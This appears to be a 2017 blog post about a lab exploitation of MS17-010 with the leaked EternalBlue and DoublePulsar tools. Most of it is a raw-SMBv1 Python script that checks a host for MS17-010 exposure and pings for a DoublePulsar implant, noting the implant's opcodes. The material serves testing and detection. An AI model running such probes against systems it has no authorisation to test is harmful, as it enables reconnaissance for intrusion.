Monday, 1 May 2017

Exploiting MS17-010 using FuzzBunch and Metasploit

FuzzBunch is an exploit framework, comparable to Metasploit, that was released in April 2017 when the ShadowBrokers group leaked a set of NSA (Equation Group) tools.

The leaked data can be found here.

The framework included, among others, the following exploits:

1) EternalBlue - MS17-010 (SMBv1)
2) EternalSynergy - MS17-010 (SMBv1)
3) EternalRomance - MS17-010 (SMBv1)
4) EternalChampion - MS17-010 (SMBv1)
5) EmeraldThread - MS10-061 (Print Spooler)
6) EskimoRoll - MS14-068 (Kerberos)
7) EducatedScholar - MS09-050 (SMBv2)
8) EclipsedWing - MS08-067 (Server service)

Here we will use EternalBlue together with DoublePulsar. EternalBlue exploits the SMBv1 flaw fixed by MS17-010 and installs the DoublePulsar kernel-mode implant; DoublePulsar is then used to inject a DLL (in this case a Metasploit payload) into a process on the target.

A virtual test bed was created for this activity. The virtual environment consisted of the following:
1) Windows XP x86 (attack box) - with Python 2.6, PyWin32 and the FuzzBunch repository installed (fb.py requires exactly this Python/PyWin32 combination)
2) Windows Server 2008 R2 SP1 (target), unpatched for MS17-010
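Before firing EternalBlue it is worth confirming that the target is actually exposed to MS17-010, and afterwards that DoublePulsar really landed. The script below is an added example written for this page (it is not from the original post, and it is not FuzzBunch or Metasploit code). It speaks raw SMBv1 with only the Python standard library and performs the two checks public scanners use: a TRANS_PEEK_NMPIPE transaction on FID 0 over IPC$ (an unpatched host answers STATUS_INSUFF_SERVER_RESOURCES, 0xC0000205) and the DoublePulsar "ping", a Trans2 SESSION_SETUP sent with multiplex ID 0x41 that the implant answers with MID 0x51. The function and constant names are mine; the magic values (ping opcode 0x23 and its 0x00A4D9A6 encoding, the MIDs, the NT status codes) are the ones used by the public MS17-010 and DoublePulsar checkers. It assumes the target has SMBv1 enabled on TCP/445 and allows an anonymous (null) session to IPC$, which is the default for Windows Server 2008 R2; the sample replies at the bottom are constructed for offline checks, not captured traffic.

```python
"""Raw SMBv1 probes for MS17-010 exposure and for a DoublePulsar implant.
Added example (editor's code, not from the original post, FuzzBunch or Metasploit).
Assumes SMBv1 on TCP/445 and a null session to IPC$; sample replies are constructed."""
import socket
import struct

SMB_COM_TRANSACTION, SMB_COM_TRANSACTION2 = 0x25, 0x32
SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP, SMB_COM_TREE_CONNECT = 0x72, 0x73, 0x75
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205                            # unpatched MS17-010 target
STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE = 0xC0000022, 0xC0000008   # patched target
DP_MID_REQUEST, DP_MID_IMPLANT = 0x41, 0x51   # MID we send / MID the implant answers with
DP_OPCODE_PING = 0x23                         # other implant opcodes: 0xC8 exec, 0x77 kill


def netbios(payload):
    """NetBIOS session-service framing: type 0x00 plus a 3-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb_header(command, tid=0, uid=0, mid=0, status=0):
    """32-byte SMBv1 header. Flags 0x18; Flags2 0x4001 = NT status codes, OEM (non-Unicode) strings."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0, uid, mid)


def parse_header(msg):
    """Header fields of a NetBIOS-framed SMB message (request or reply)."""
    f = struct.unpack("<4sBIBHH8sHHHHH", msg[4:36])
    if f[0] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    return {"command": f[1], "status": f[2], "tid": f[8], "uid": f[10], "mid": f[11]}


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return netbios(smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)


def session_setup_request():
    """Legacy (non-extended-security) SESSION_SETUP_ANDX with empty account and domain: a null session."""
    # AndX end, MaxBuffer, MaxMpx, VcNumber, SessionKey, OEM pw len 1, Unicode pw len 0, CAP_NT_SMBS|CAP_STATUS32
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 0, 0, 1, 0, 0, 0x50)
    data = b"\x00" * 5  # password, account, domain, native OS, native LAN manager (all empty)
    return netbios(smb_header(SMB_COM_SESSION_SETUP) + b"\x0d" + words + struct.pack("<H", len(data)) + data)


def tree_connect_request(uid, host):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # AndX end, flags, 1-byte password
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    return netbios(smb_header(SMB_COM_TREE_CONNECT, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data)


def ms17_010_probe_request(tid, uid):
    """SMB_COM_TRANSACTION to \\PIPE\\ with setup [TRANS_PEEK_NMPIPE=0x23, FID=0] and no parameters or data."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)  # where parameters/data would start (74)
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, offset, 0, offset, 2, 0, 0x0023, 0)
    return netbios(smb_header(SMB_COM_TRANSACTION, tid, uid, 42) + b"\x10" + words
                   + struct.pack("<H", len(name)) + name)


def doublepulsar_timeout(op, k):
    """Encode an implant opcode into the Trans2 Timeout field; k is a 32-bit seed (bits 8..23 are kept)."""
    low = (op - ((k & 0xFFFF00) >> 16) - ((k & 0xFF00) >> 8)) & 0xFF
    return low | (k & 0xFFFF00)


def doublepulsar_opcode(timeout):
    """Inverse of doublepulsar_timeout: recover the opcode the implant would see."""
    return (timeout + ((timeout >> 16) & 0xFF) + ((timeout >> 8) & 0xFF)) & 0xFF


def doublepulsar_ping_request(tid, uid, seed=0x00A4D900):
    """Trans2 SESSION_SETUP (setup 0x000E) carrying the encoded ping; the default seed gives 0x00A4D9A6."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, doublepulsar_timeout(DP_OPCODE_PING, seed),
                        0, 12, 66, 0, 78, 1, 0, 0x000E)
    return netbios(smb_header(SMB_COM_TRANSACTION2, tid, uid, DP_MID_REQUEST)
                   + b"\x0f" + words + struct.pack("<H", 13) + b"\x00" + b"\x00" * 12)


def classify_ms17_010(response):
    status = parse_header(response)["status"]
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"
    return "patched" if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE) else "unknown"


def doublepulsar_present(response):
    return parse_header(response)["mid"] == DP_MID_IMPLANT


def _exchange(sock, packet):
    sock.sendall(packet)
    head = sock.recv(4)
    msg = head
    while len(msg) < 4 + int.from_bytes(head[1:4], "big"):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the connection")
        msg += chunk
    return msg


def probe(host, port=445, timeout=5.0):
    """Live check: returns (ms17_010 classification, DoublePulsar present?)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if parse_header(_exchange(s, negotiate_request()))["status"] != 0:
            raise RuntimeError("SMBv1 negotiate failed (SMBv1 disabled?)")
        setup = parse_header(_exchange(s, session_setup_request()))
        if setup["status"] != 0:
            raise RuntimeError("null session rejected: 0x%08X" % setup["status"])
        uid = setup["uid"]
        tid = parse_header(_exchange(s, tree_connect_request(uid, host)))["tid"]
        vuln = classify_ms17_010(_exchange(s, ms17_010_probe_request(tid, uid)))
        implant = doublepulsar_present(_exchange(s, doublepulsar_ping_request(tid, uid)))
    return vuln, implant


# Constructed sample replies (not captured traffic) so the classifiers can be exercised offline.
SAMPLE_VULNERABLE = netbios(smb_header(SMB_COM_TRANSACTION, 2048, 2048, 42, STATUS_INSUFF_SERVER_RESOURCES))
SAMPLE_PATCHED = netbios(smb_header(SMB_COM_TRANSACTION, 2048, 2048, 42, STATUS_ACCESS_DENIED))
SAMPLE_IMPLANT = netbios(smb_header(SMB_COM_TRANSACTION2, 2048, 2048, DP_MID_IMPLANT))
SAMPLE_CLEAN = netbios(smb_header(SMB_COM_TRANSACTION2, 2048, 2048, DP_MID_REQUEST))
```

Run `probe("<target>")` from any box that can reach port 445 once before the exploit (expect `("vulnerable", False)` on the unpatched 2008 R2 target) and once after EternalBlue has run (expect `("vulnerable", True)`). The implant is memory-resident, so if the lab box is not going to be rebooted, remove it afterwards with DoublePulsar's own kill command rather than leaving a backdoor listening on 445.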

Video PoC: